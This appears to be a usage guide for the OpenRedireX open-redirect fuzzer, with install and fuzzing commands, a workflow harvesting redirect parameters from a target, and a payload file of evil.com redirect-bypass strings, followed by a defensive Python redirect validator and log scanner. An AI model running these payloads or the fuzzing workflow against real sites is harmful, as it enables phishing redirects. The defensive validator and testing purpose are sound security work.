Description
OpenRedireX is a fuzzer designed specifically for finding open redirect vulnerabilities. It takes a list of URLs in which the suspected redirect parameter value is replaced by a keyword marker (FUZZ by default), substitutes each payload from a payload file for that marker, and reports targets that redirect off-site, covering multiple payloads and parser-bypass techniques.
Installation
BASH
git clone https://github.com/devanshbatham/OpenRedireX.git
cd OpenRedireX
pip3 install -r requirements.txt
Basic Usage
BASH
# Test URLs from file
python3 openredirex.py -l urls.txt -p payloads.txt
# Single URL
echo "https://target.com/login?redirect=FUZZ" | python3 openredirex.py -p payloads.txt
Advanced Usage
BASH
# Custom keyword marker
python3 openredirex.py -l urls.txt -p payloads.txt -k "FUZZ"
# Concurrent requests
python3 openredirex.py -l urls.txt -p payloads.txt --max-concurrency 30
Common Workflows
BASH
# Step 1: Collect URLs with redirect parameters
gau target.com | grep -iE "=http|=https|=//|redirect|return|next|url|dest|rurl" | sort -u > redirect_candidates.txt
# Step 2: Create payload file
cat << 'EOF' > payloads.txt
https://evil.com
//evil.com
https://target.com@evil.com
/\evil.com
https://evil.com?.target.com
https://evil.com#.target.com
https://evil.com%23.target.com
EOF
# Step 3: Fuzz
python3 openredirex.py -l redirect_candidates.txt -p payloads.txt --max-concurrency 20
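The payload list in Step 2 is also a useful regression test for the fix. The following is an added example, not part of OpenRedireX or this page's workflow: a redirect-target validator written from the defender's side that rejects every payload above while still allowing same-site paths and an allowlisted host, plus a small access-log scanner that reuses the same validator to flag requests whose redirect-style parameters (the names from the Step 1 grep) point off-site. The allowlist host `target.com`, the parameter names, and the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Hostnames the application may redirect to (constructed allowlist;
# target.com is the placeholder host used in the examples above).
ALLOWED_HOSTS = {"target.com"}

# Parameter names that commonly carry redirect targets (taken from the
# grep pattern in Step 1 above).
REDIRECT_PARAMS = {"redirect", "return", "next", "url", "dest", "rurl"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` is a same-origin path or an absolute
    http(s) URL whose host is on the allowlist; anything ambiguous is rejected."""
    if not target:
        return False
    # Judge the decoded form so that %23 ('#') or %2F ('/') cannot hide a separator.
    decoded = unquote(target)
    # Backslashes, whitespace and control characters are normalised differently
    # by browsers and server-side parsers ("/\evil.com"), so refuse them outright.
    if any(ch == "\\" or ord(ch) <= 0x20 for ch in decoded):
        return False
    try:
        parts = urlsplit(decoded)
    except ValueError:
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading '/'; '//host' is scheme-relative.
        return decoded.startswith("/") and not decoded.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False
    # 'https://target.com@evil.com' places the trusted name in the userinfo part.
    if parts.username is not None or parts.password is not None:
        return False
    return (parts.hostname or "").lower() in allowed_hosts


# The payload list from Step 2, reproduced here as validator test input.
PAGE_PAYLOADS = [
    "https://evil.com",
    "//evil.com",
    "https://target.com@evil.com",
    "/\\evil.com",
    "https://evil.com?.target.com",
    "https://evil.com#.target.com",
    "https://evil.com%23.target.com",
]


def evaluate_payloads(payloads=PAGE_PAYLOADS):
    """Map each payload to the validator's verdict; a correct validator yields all False."""
    return {p: is_safe_redirect(p) for p in payloads}


# Minimal combined-log-format matcher (client IP, method, request path, status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_offsite_redirects(log_lines):
    """Return (ip, param, value, status) for requests whose redirect-style
    parameter carries a target the validator would reject."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("path")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in REDIRECT_PARAMS:
                continue
            for value in values:
                if not is_safe_redirect(value):
                    hits.append((m.group("ip"), name, value, int(m.group("status"))))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login?redirect=/account HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /login?redirect=//evil.com HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login?next=https://target.com@evil.com HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /login?redirect=https://evil.com%23.target.com HTTP/1.1" 302 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=redirect HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for payload, verdict in evaluate_payloads().items():
        print(f"{'ALLOW' if verdict else 'BLOCK'}  {payload}")
    for hit in find_offsite_redirects(SAMPLE_LOG):
        print("off-site redirect attempt:", hit)
```

The validator deliberately works on the percent-decoded string and refuses any userinfo, backslash or scheme-relative form rather than trying to enumerate bypasses, so the check holds against the whole payload list rather than one pattern at a time; the log scanner is only a starting point, since a 302 with an off-site Location header, not the request alone, is what confirms the redirect actually fired.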